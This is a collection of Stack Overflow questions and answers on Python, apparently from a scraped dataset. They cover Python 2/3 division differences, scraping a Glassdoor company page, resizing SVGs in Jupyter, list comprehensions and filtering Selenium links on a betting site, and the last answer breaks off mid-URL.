Q: Python Version Creates Different Dictionaries I have a script which needs to be compatible with both Python 2 and 3. The code utilizes a dictionary with is generated using the following line of code: x = {2**x-1: 1-1/8*x if x>0 else -1 for x in range(0,9)} In Python 3.6.8, the dictionary is: >>> x {0: -1, 1: 0.875, 3: 0.75, 7: 0.625, 15: 0.5, 31: 0.375, 63: 0.25, 127: 0.125, 255: 0.0} In Python 2.7.5, the dictionary is: >>> x {0: -1, 1: 1, 3: 1, 7: 1, 15: 1, 31: 1, 63: 1, 127: 1, 255: 1} The dictionary generated in Python3 is the desired output. To generate the correct dictionary values in Python2, I have tried float(1-1/8*x) 1-float(1/8*x) 1-1/8*float(x) without success. I would greatly appreciate insight into why this behavior occurs. Thank you very much. A: The solution I found that is compatible for both versions of Python is: x = {2**x-1: 1-float(x)/8 if x>0 else -1 for x in range(0,9)}
Python Version Creates Different Dictionaries
I have a script which needs to be compatible with both Python 2 and 3. The code utilizes a dictionary with is generated using the following line of code: x = {2**x-1: 1-1/8*x if x>0 else -1 for x in range(0,9)} In Python 3.6.8, the dictionary is: >>> x {0: -1, 1: 0.875, 3: 0.75, 7: 0.625, 15: 0.5, 31: 0.375, 63: 0.25, 127: 0.125, 255: 0.0} In Python 2.7.5, the dictionary is: >>> x {0: -1, 1: 1, 3: 1, 7: 1, 15: 1, 31: 1, 63: 1, 127: 1, 255: 1} The dictionary generated in Python3 is the desired output. To generate the correct dictionary values in Python2, I have tried float(1-1/8*x) 1-float(1/8*x) 1-1/8*float(x) without success. I would greatly appreciate insight into why this behavior occurs. Thank you very much.
[ "The solution I found that is compatible for both versions of Python is:\nx = {2**x-1: 1-float(x)/8 if x>0 else -1 for x in range(0,9)}\n\n" ]
[ 1 ]
[]
[]
[ "dictionary", "floating_point", "python", "python_2.7", "python_3.x" ]
stackoverflow_0074593472_dictionary_floating_point_python_python_2.7_python_3.x.txt
Q: scrape the overview I wonder why I cannot scrape this company overview. An example is that I want to scrape Walmart's size, which is 10000+ employees. Below is my code, not sure why the info I am looking for is not there... import requests from bs4 import BeautifulSoup import pandas as pd headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.80 Safari/537.36'} url = f'https://www.glassdoor.com/Overview/Working-at-Walmart-EI_IE715.11,18.htm' # f'https://www.glassdoor.com/Reviews/Google-Engineering-Reviews-EI_IE9079.0,6_DEPT1007_IP{pg}.htm?sort.sortType=RD&sort.ascending=false&filter.iso3Language=eng' r = requests.get(url, headers) soup = BeautifulSoup(r.content, 'html.parser') I deeply appreciate any help to scrape this "size" factor on the company webpage. A: Here is one possible solution: import re import json import requests from bs4 import BeautifulSoup headers = { 'user-agent': 'Mozilla/5.0' } with requests.Session() as session: session.headers.update(headers) raw_data = session.get(f'https://www.glassdoor.com/Overview/Working-at-Walmart-EI_IE715.htm').text script = [s.text for s in BeautifulSoup(raw_data, "lxml").find_all("script") if "window.appCache" in s.text][0] json_data = json.loads(re.findall(r'(\"Employer:\d+\":)(.+)(,\"ROOT_QUERY\")', script)[0][1]) data = { "id": json_data["id"], "shortName": json_data["shortName"], "website": json_data["website"], "type": json_data["type"], "revenue": json_data["revenue"], "headquarters": json_data["headquarters"], "size": json_data["size"], "yearFounded": json_data["yearFounded"] } print(data) Output: { 'id': 715, 'shortName': 'Walmart', 'website': 'careers.walmart.com', 'type': 'Company - Public', 'revenue': '$10+ billion (USD)', 'headquarters': 'Bentonville, AR', 'size': '10000+ Employees', 'yearFounded': 1962 } If you only need "size" then just use e.g. size = json_data["size"]
scrape the overview
I wonder why I cannot scrape this company overview. An example is that I want to scrape Walmart's size, which is 10000+ employees. Below is my code, not sure why the info I am looking for is not there... import requests from bs4 import BeautifulSoup import pandas as pd headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.80 Safari/537.36'} url = f'https://www.glassdoor.com/Overview/Working-at-Walmart-EI_IE715.11,18.htm' # f'https://www.glassdoor.com/Reviews/Google-Engineering-Reviews-EI_IE9079.0,6_DEPT1007_IP{pg}.htm?sort.sortType=RD&sort.ascending=false&filter.iso3Language=eng' r = requests.get(url, headers) soup = BeautifulSoup(r.content, 'html.parser') I deeply appreciate any help to scrape this "size" factor on the company webpage.
[ "Here is one possible solution:\nimport re\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nheaders = {\n 'user-agent': 'Mozilla/5.0'\n}\n\nwith requests.Session() as session:\n session.headers.update(headers)\n raw_data = session.get(f'https://www.glassdoor.com/Overview/Working-at-Walmart-EI_IE715.htm').text\n \n script = [s.text for s in BeautifulSoup(raw_data, \"lxml\").find_all(\"script\") if \"window.appCache\" in s.text][0]\n json_data = json.loads(re.findall(r'(\\\"Employer:\\d+\\\":)(.+)(,\\\"ROOT_QUERY\\\")', script)[0][1])\n\n data = {\n \"id\": json_data[\"id\"],\n \"shortName\": json_data[\"shortName\"],\n \"website\": json_data[\"website\"],\n \"type\": json_data[\"type\"],\n \"revenue\": json_data[\"revenue\"],\n \"headquarters\": json_data[\"headquarters\"],\n \"size\": json_data[\"size\"],\n \"yearFounded\": json_data[\"yearFounded\"]\n }\n \n print(data)\n\nOutput:\n{\n 'id': 715,\n 'shortName': 'Walmart',\n 'website': 'careers.walmart.com',\n 'type': 'Company - Public',\n 'revenue': '$10+ billion (USD)',\n 'headquarters': 'Bentonville, AR',\n 'size': '10000+ Employees',\n 'yearFounded': 1962\n}\n\nIf you only need \"size\" then just use e.g. size = json_data[\"size\"]\n" ]
[ 0 ]
[]
[]
[ "beautifulsoup", "python", "selenium", "web_scraping" ]
stackoverflow_0074588025_beautifulsoup_python_selenium_web_scraping.txt
Q: How to resize / rescale a SVG graphic in an iPython / Jupyter Notebook? I've a large SVG (.svg graphic) object to display in a iPython / Jupyter Notebook. In fact, I've a large neural network model graphic created with Keras to display. from IPython.display import SVG from keras.utils.vis_utils import model_to_dot SVG(model_to_dot(model,show_shapes=True).create(prog='dot', format='svg')) So, I want to resize / rescale / shrink the SVG graphic to fit in my Notebook page (particularly horizontally, since the page width is limited). A: Another option is to use the "dpi" (dots per inch) property. A little hacky but this allowed me to shrink my SVG. Tensorflow: model_to_doc from IPython.display import SVG from keras.utils import model_to_dot SVG(model_to_dot(model, show_shapes= True, show_layer_names=True, dpi=65).create(prog='dot', format='svg')) A: A new improved solution particularly useful using spaCy, (tested with the version 2.2.4). In order to be able to scale the .svg without cropping, we must add a viewBox to the XML / HTML svg representation. Before scaling: import spacy import re from spacy import displacy nlp_model = spacy.load("en_core_web_sm") doc = nlp_model(u"To be or not to be, that is the question") svg = displacy.render(doc, style='dep', page=True, jupyter=False) def add_viewbox_svg(svg): regex = r'class="displacy" width="([\d\.]*)" height="([\d\.]*)' match_results = re.findall(regex,svg) new_svg = svg.replace("<svg ","<svg viewBox='0 0 "+ match_results[0][0]+" "+ match_results[0][1]+ "' preserveAspectRatio='none' ") return new_svg new_svg = add_viewbox_svg(svg) Then using style: style = "<style>svg{width:100% !important;height:100% !important;</style>" display(HTML(style)) display(HTML(new_svg)) After scaling: A: This is what worked for me: from IPython.display import SVG, display, HTML import base64 _html_template='<img width="{}" src="data:image/svg+xml;base64,{}" >' def svg_to_fixed_width_html_image(svg, width="100%"): text = _html_template.format(width, base64.b64encode(svg)) return HTML(text) svg_to_fixed_width_html_image(svg) A: Above CSS-based workaround does not seem to work for me, as both width= and height= were directly set in attribute of generated SVG element. As an additional workaround, here's what I got: iv1_dot = model_to_dot(iv1_model, show_shapes=False, show_layer_names=False, rankdir='LR') iv1_dot.set_size('48x8') SVG(iv1_dot.create(prog=['dot'], format='svg')) This allowed me to specify size of graphviz drawing in inch (48x8, in above case). A: The answers above and below are really good but depends upon the system. They might or might not work for you always depending upon your browser plugins, Jupyter version, Colab environment, etc. Generally, SVG() converts the dot image to an SVG file but it is tricky to adjust the size of that by customizing the associating HTML. What I'd suggest is using this: from keras.utils import plot_model plot_model(model, to_file='model.png') You can then use the snippet in the above answer by user48956 to adjust the size of the image generated. But most of the time, it scales on its own. Further Reference: Here A: The other solutions all had some issues for my use case. I thus propose this solution which manipulates the svg data directly using BeautifulSoup: from IPython.display import SVG from bs4 import BeautifulSoup import re def scale_svg(svg_object, scale=1.0): soup = BeautifulSoup(svg_object.data, 'lxml') svg_elt = soup.find("svg") w = svg_elt.attrs["width"].rstrip("pt") h = svg_elt.attrs["height"].rstrip("pt") ws = float(w)*scale hs = float(h)*scale svg_elt.attrs["width"] = f"{ws}pt" svg_elt.attrs["height"] = f"{hs}pt" svg_elt.attrs["viewbox"] = f"0.00 0.00 {ws} {hs}" g_elt = svg_elt.find("g") tf = g_elt.attrs["transform"] # non-greedy regex-search-and-replace tf2 = re.sub( "scale\(.*?\)", f"scale({scale} {scale})", tf ) g_elt.attrs["transform"] = tf2 svg_object.data = str(svg_elt) return svg_object s1 = SVG(""" <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="103.0pt" viewbox="0.00 0.00 170.0 103.0" width="170.0pt"> <g class="graph" id="graph0" transform="scale(1.0 1.0) rotate(0) translate(4 199)"> <title>G</title> <polygon fill="#ffffff" points="-4,4 -4,-199 166,-199 166,4 -4,4" stroke="transparent"/> <!-- node0000 --> <g class="node" id="node1"> <title>node0000</title> <ellipse cx="81" cy="-159" fill="none" rx="36" ry="36" stroke="#000000"/> <text fill="#000000" font-family="Times,serif" font-size="10.00" text-anchor="middle" x="81" y="-156.5">ABCDEFGH</text> </g> </g> </svg> """) scale_svg(s1, 3.2) A: To add to user48956's answer, the above only works if your SVG is already a string. For SVGs loaded from file, use this: svg_to_fixed_width_html_image(SVG('example.svg').data.encode('ascii'), width="100%")
How to resize / rescale a SVG graphic in an iPython / Jupyter Notebook?
I've a large SVG (.svg graphic) object to display in a iPython / Jupyter Notebook. In fact, I've a large neural network model graphic created with Keras to display. from IPython.display import SVG from keras.utils.vis_utils import model_to_dot SVG(model_to_dot(model,show_shapes=True).create(prog='dot', format='svg')) So, I want to resize / rescale / shrink the SVG graphic to fit in my Notebook page (particularly horizontally, since the page width is limited).
[ "Another option is to use the \"dpi\" (dots per inch) property. A little hacky but this allowed me to shrink my SVG. \nTensorflow: model_to_doc\n from IPython.display import SVG\n from keras.utils import model_to_dot\n\n SVG(model_to_dot(model, show_shapes= True, show_layer_names=True, dpi=65).create(prog='dot', format='svg'))\n\n", "A new improved solution particularly useful using spaCy, (tested with the version 2.2.4). In order to be able to scale the .svg without cropping, we must add a viewBox to the XML / HTML svg representation.\nBefore scaling:\n\nimport spacy\nimport re\nfrom spacy import displacy\n\nnlp_model = spacy.load(\"en_core_web_sm\")\ndoc = nlp_model(u\"To be or not to be, that is the question\")\nsvg = displacy.render(doc, style='dep', page=True, jupyter=False)\n\ndef add_viewbox_svg(svg):\n regex = r'class=\"displacy\" width=\"([\\d\\.]*)\" height=\"([\\d\\.]*)'\n match_results = re.findall(regex,svg)\n new_svg = svg.replace(\"<svg \",\"<svg viewBox='0 0 \"+\n match_results[0][0]+\" \"+\n match_results[0][1]+\n \"' preserveAspectRatio='none' \")\n return new_svg\n\nnew_svg = add_viewbox_svg(svg)\n\nThen using style:\nstyle = \"<style>svg{width:100% !important;height:100% !important;</style>\"\ndisplay(HTML(style))\ndisplay(HTML(new_svg))\n\nAfter scaling:\n\n", "This is what worked for me:\nfrom IPython.display import SVG, display, HTML\nimport base64\n_html_template='<img width=\"{}\" src=\"data:image/svg+xml;base64,{}\" >'\n\ndef svg_to_fixed_width_html_image(svg, width=\"100%\"):\n text = _html_template.format(width, base64.b64encode(svg))\n return HTML(text)\n\nsvg_to_fixed_width_html_image(svg)\n\n\n", "Above CSS-based workaround does not seem to work for me, as both width= and height= were directly set in attribute of generated SVG element.\nAs an additional workaround, here's what I got:\niv1_dot = model_to_dot(iv1_model, show_shapes=False, show_layer_names=False, rankdir='LR')\niv1_dot.set_size('48x8')\nSVG(iv1_dot.create(prog=['dot'], format='svg'))\n\nThis allowed me to specify size of graphviz drawing in inch (48x8, in above case).\n", "The answers above and below are really good but depends upon the system. They might or might not work for you always depending upon your browser plugins, Jupyter version, Colab environment, etc. Generally, SVG() converts the dot image to an SVG file but it is tricky to adjust the size of that by customizing the associating HTML. What I'd suggest is using this:\nfrom keras.utils import plot_model\nplot_model(model, to_file='model.png')\n\nYou can then use the snippet in the above answer by user48956 to adjust the size of the image generated. But most of the time, it scales on its own.\nFurther Reference: Here\n", "The other solutions all had some issues for my use case. I thus propose this solution which manipulates the svg data directly using BeautifulSoup:\nfrom IPython.display import SVG\nfrom bs4 import BeautifulSoup\nimport re\n\n\ndef scale_svg(svg_object, scale=1.0):\n\n soup = BeautifulSoup(svg_object.data, 'lxml')\n svg_elt = soup.find(\"svg\")\n w = svg_elt.attrs[\"width\"].rstrip(\"pt\")\n h = svg_elt.attrs[\"height\"].rstrip(\"pt\")\n\n ws = float(w)*scale\n hs = float(h)*scale\n\n svg_elt.attrs[\"width\"] = f\"{ws}pt\"\n svg_elt.attrs[\"height\"] = f\"{hs}pt\"\n svg_elt.attrs[\"viewbox\"] = f\"0.00 0.00 {ws} {hs}\"\n\n g_elt = svg_elt.find(\"g\")\n tf = g_elt.attrs[\"transform\"]\n # non-greedy regex-search-and-replace\n tf2 = re.sub(\n \"scale\\(.*?\\)\",\n f\"scale({scale} {scale})\",\n tf\n )\n g_elt.attrs[\"transform\"] = tf2\n\n svg_object.data = str(svg_elt)\n \n return svg_object\n\ns1 = SVG(\"\"\"\n<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" height=\"103.0pt\" viewbox=\"0.00 0.00 170.0 103.0\" width=\"170.0pt\">\n<g class=\"graph\" id=\"graph0\" transform=\"scale(1.0 1.0) rotate(0) translate(4 199)\">\n<title>G</title>\n<polygon fill=\"#ffffff\" points=\"-4,4 -4,-199 166,-199 166,4 -4,4\" stroke=\"transparent\"/>\n<!-- node0000 -->\n<g class=\"node\" id=\"node1\">\n<title>node0000</title>\n<ellipse cx=\"81\" cy=\"-159\" fill=\"none\" rx=\"36\" ry=\"36\" stroke=\"#000000\"/>\n<text fill=\"#000000\" font-family=\"Times,serif\" font-size=\"10.00\" text-anchor=\"middle\" x=\"81\" y=\"-156.5\">ABCDEFGH</text>\n</g>\n</g>\n</svg>\n\"\"\")\n\nscale_svg(s1, 3.2)\n\n", "To add to user48956's answer, the above only works if your SVG is already a string.\nFor SVGs loaded from file, use this:\nsvg_to_fixed_width_html_image(SVG('example.svg').data.encode('ascii'), width=\"100%\")\n\n\n" ]
[ 12, 5, 3, 0, 0, 0, 0 ]
[]
[]
[ "jupyter_notebook", "keras", "python", "svg" ]
stackoverflow_0051452569_jupyter_notebook_keras_python_svg.txt
Q: List of the first item in a sublist I want a list that displays the first element of the sublists I input. def firstelements(w): return [item[0] for item in w] Which works, but when I try doing firstelements([[10,10],[3,5],[]]) there's an error because of the []. How can I fix this? A: Add a condition to your list comprehension so that empty lists are skipped. def firstelements(w): return [item[0] for item in w if item != []] If you wish to represent that empty list with something but don't want an error you might use a conditional expression in your list comprehension. def firstelements(w): return [item[0] if item != [] else None for item in w] >>> firstelements([[10,10],[3,5],[]]) [10, 3, None] A: Add a condition to check if the item has data. def firstelements(w): return [item[0] for item in w if item] Below are 3 more ways you can write it that don't require a condition. filter strips out None/"Empty" values. def firstelements(w): return list(zip(*filter(None, w)))[0] def firstelements(w): return [item[0] for item in filter(None, w)] def firstelements(w): return [i for (i,*_) in filter(None, w)]
List of the first item in a sublist
I want a list that displays the first element of the sublists I input. def firstelements(w): return [item[0] for item in w] Which works, but when I try doing firstelements([[10,10],[3,5],[]]) there's an error because of the []. How can I fix this?
[ "Add a condition to your list comprehension so that empty lists are skipped.\ndef firstelements(w):\n return [item[0] for item in w if item != []]\n\nIf you wish to represent that empty list with something but don't want an error you might use a conditional expression in your list comprehension.\ndef firstelements(w):\n return [item[0] if item != [] else None for item in w]\n\n>>> firstelements([[10,10],[3,5],[]])\n[10, 3, None]\n\n", "Add a condition to check if the item has data.\ndef firstelements(w):\n return [item[0] for item in w if item]\n\nBelow are 3 more ways you can write it that don't require a condition. filter strips out None/\"Empty\" values.\ndef firstelements(w):\n return list(zip(*filter(None, w)))[0]\n\ndef firstelements(w):\n return [item[0] for item in filter(None, w)]\n\ndef firstelements(w):\n return [i for (i,*_) in filter(None, w)]\n\n" ]
[ 2, 1 ]
[]
[]
[ "python" ]
stackoverflow_0074593459_python.txt
Q: Retrieving specific matches from a list in python from selenium import webdriver from selenium.webdriver.chrome.options import Options from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver import ActionChains from selenium.webdriver.common.by import By from time import sleep from datetime import datetime import pandas as pd import warnings import os os.chdir('C:/Users/paulc/Documents/Medium Football') warnings.filterwarnings('ignore') base_url = 'https://www.sportingindex.com/spread-betting/football/international-world-cup' option = Options() option.headless = False driver = webdriver.Chrome("C:/Users/paulc/Documents/Medium Football/chromedriver.exe",options=option) driver.get(base_url) links = [elem.get_attribute("href") for elem in driver.find_elements(By.TAG_NAME,"a")] this code retrieves all the href links on this page. I want to search the links list and return only the matches that contain 'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a' however I get the AttributeError: 'NoneType' object has no attribute 'startswith' using import re [x for x in links if x.startswith('https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')] help is appreciated. A: Instead of collecting all a elements on the page where will be a lot of irrelevant results you can use more precise locator. So, instead of driver.find_elements(By.TAG_NAME,"a") Use this: driver.find_elements(By.XPATH,"//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]") This will give you desired elements only. And this links = [elem.get_attribute("href") for elem in driver.find_elements(By.XPATH,"//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]")] will directly give you the wanted links only. UPD In case this is giving you an empty list you possibly are missing a delay. So, you can simply add some pause before that line, like time.sleep(2) but it's better to use WebDriverWait expected_conditions explicit waits for that. I can't check it since my computer is blocking that link due to my company policy since that is a gambling site, but normally something like this should work: from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.common.by import By from selenium.webdriver.support import expected_conditions as EC wait = WebDriverWait(driver, 10) links = [elem.get_attribute("href") for elem in wait.until(EC.visibility_of_all_elements_located((By.XPATH, "//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]")))] A: The following code is filtering to grab the right links import time from bs4 import BeautifulSoup import pandas as pd from selenium.webdriver.chrome.service import Service from selenium import webdriver webdriver_service = Service("./chromedriver") #Your chromedriver path driver = webdriver.Chrome(service=webdriver_service) driver.get('https://www.sportingindex.com/spread-betting/football/international-world-cup') driver.maximize_window() time.sleep(8) soup = BeautifulSoup(driver.page_source,"lxml") for u in soup.select('a[class="gatracking"]'): link = 'https://www.sportingindex.com' + u.get('href') if '-v-' in link: print(link) Output: https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v-ghana https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56acd403d6/brazil-v-switzerland https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.dd7a995d-7478-45f8-af27-9f234d37cc76/ecuador-v-senegal https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.92232207-0f1e-4bb1-bacd-1332ef6b9007/netherlands-v-qatar https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.b913620e-69c7-4606-a153-7b48589b7c94/iran-v-usa https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7a4a18fb-d4ee-4880-849f-f1afdea33cd5/wales-v-england https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.20c098b4-4e97-4fd1-97b0-f42d84424361/australia-v-denmark https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5a7476e2-8d35-4a8e-8065-b4339e79f395/tunisia-v-france https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.8a869f02-9dd0-49c5-91bd-209ee224fc2a/poland-v-argentina https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.6379b787-f246-4ba4-a896-28a97396d02f/saudi-arabia-v-mexico https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.52737cfd-da19-42dd-b15b-c16c3e8e9a86/canada-v-morocco https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.168fab1f-8360-4e87-ba84-bfbd11a4a207/croatia-v-belgium https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.9fb541f0-43a4-409c-8e54-e34a43965714/costa-rica-v-germany https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7379c8a7-ab5d-4653-b487-22bf7ff8eefe/japan-v-spain https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.e7e4c6be-98b7-4258-ba40-74c54a790fe1/ghana-v-uruguay https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.e4c18c81-565e-47ce-b08d-9aed62c88a5d/south-korea-v-portugal https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.18f44028-e23d-48d4-970b-e75c164589bd/cameroon-v-brazil https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.526f9b1b-6d95-4f44-abce-e0a6a30acfd4/serbia-v-switzerland https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v-ghana https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56acd403d6/brazil-v-switzerland https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany https://www.sportingindex.com/spread-betting/rugby-union/france-top-14/group_a.ad22f34f-9cd6-47b4-a826-0c0f0dce7df2/lyon-v-toulouse https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany https://www.sportingindex.com/spread-betting/rugby-union/france-top-14/group_a.ad22f34f-9cd6-47b4-a826-0c0f0dce7df2/lyon-v-toulouse https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v-ghana https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56acd403d6/brazil-v-switzerland https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay
Retrieving specific matches from a list in python
from selenium import webdriver from selenium.webdriver.chrome.options import Options from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver import ActionChains from selenium.webdriver.common.by import By from time import sleep from datetime import datetime import pandas as pd import warnings import os os.chdir('C:/Users/paulc/Documents/Medium Football') warnings.filterwarnings('ignore') base_url = 'https://www.sportingindex.com/spread-betting/football/international-world-cup' option = Options() option.headless = False driver = webdriver.Chrome("C:/Users/paulc/Documents/Medium Football/chromedriver.exe",options=option) driver.get(base_url) links = [elem.get_attribute("href") for elem in driver.find_elements(By.TAG_NAME,"a")] this code retrieves all the href links on this page. I want to search the links list and return only the matches that contain 'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a' however I get the AttributeError: 'NoneType' object has no attribute 'startswith' using import re [x for x in links if x.startswith('https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')] help is appreciated.
[ "Instead of collecting all a elements on the page where will be a lot of irrelevant results you can use more precise locator.\nSo, instead of\ndriver.find_elements(By.TAG_NAME,\"a\")\n\nUse this:\ndriver.find_elements(By.XPATH,\"//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]\")\n\nThis will give you desired elements only.\nAnd this\nlinks = [elem.get_attribute(\"href\") for elem in driver.find_elements(By.XPATH,\"//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]\")]\n\nwill directly give you the wanted links only.\nUPD\nIn case this is giving you an empty list you possibly are missing a delay. So, you can simply add some pause before that line, like time.sleep(2) but it's better to use WebDriverWait expected_conditions explicit waits for that.\nI can't check it since my computer is blocking that link due to my company policy since that is a gambling site, but normally something like this should work:\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\n\nwait = WebDriverWait(driver, 10)\n\nlinks = [elem.get_attribute(\"href\") for elem in wait.until(EC.visibility_of_all_elements_located((By.XPATH, \"//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]\")))]\n\n", "The following code is filtering to grab the right links\nimport time\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium import webdriver\nwebdriver_service = Service(\"./chromedriver\") #Your chromedriver path\ndriver = webdriver.Chrome(service=webdriver_service)\n\ndriver.get('https://www.sportingindex.com/spread-betting/football/international-world-cup')\ndriver.maximize_window()\ntime.sleep(8)\n\n\nsoup = BeautifulSoup(driver.page_source,\"lxml\")\nfor u in soup.select('a[class=\"gatracking\"]'):\n link = 'https://www.sportingindex.com' + u.get('href')\n\n if '-v-' in link:\n print(link)\n\nOutput:\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v-ghana\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56acd403d6/brazil-v-switzerland\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.dd7a995d-7478-45f8-af27-9f234d37cc76/ecuador-v-senegal\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.92232207-0f1e-4bb1-bacd-1332ef6b9007/netherlands-v-qatar\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.b913620e-69c7-4606-a153-7b48589b7c94/iran-v-usa\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7a4a18fb-d4ee-4880-849f-f1afdea33cd5/wales-v-england\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.20c098b4-4e97-4fd1-97b0-f42d84424361/australia-v-denmark\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5a7476e2-8d35-4a8e-8065-b4339e79f395/tunisia-v-france\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.8a869f02-9dd0-49c5-91bd-209ee224fc2a/poland-v-argentina\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.6379b787-f246-4ba4-a896-28a97396d02f/saudi-arabia-v-mexico\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.52737cfd-da19-42dd-b15b-c16c3e8e9a86/canada-v-morocco\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.168fab1f-8360-4e87-ba84-bfbd11a4a207/croatia-v-belgium\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.9fb541f0-43a4-409c-8e54-e34a43965714/costa-rica-v-germany\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7379c8a7-ab5d-4653-b487-22bf7ff8eefe/japan-v-spain\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.e7e4c6be-98b7-4258-ba40-74c54a790fe1/ghana-v-uruguay\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.e4c18c81-565e-47ce-b08d-9aed62c88a5d/south-korea-v-portugal\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.18f44028-e23d-48d4-970b-e75c164589bd/cameroon-v-brazil\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.526f9b1b-6d95-4f44-abce-e0a6a30acfd4/serbia-v-switzerland\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v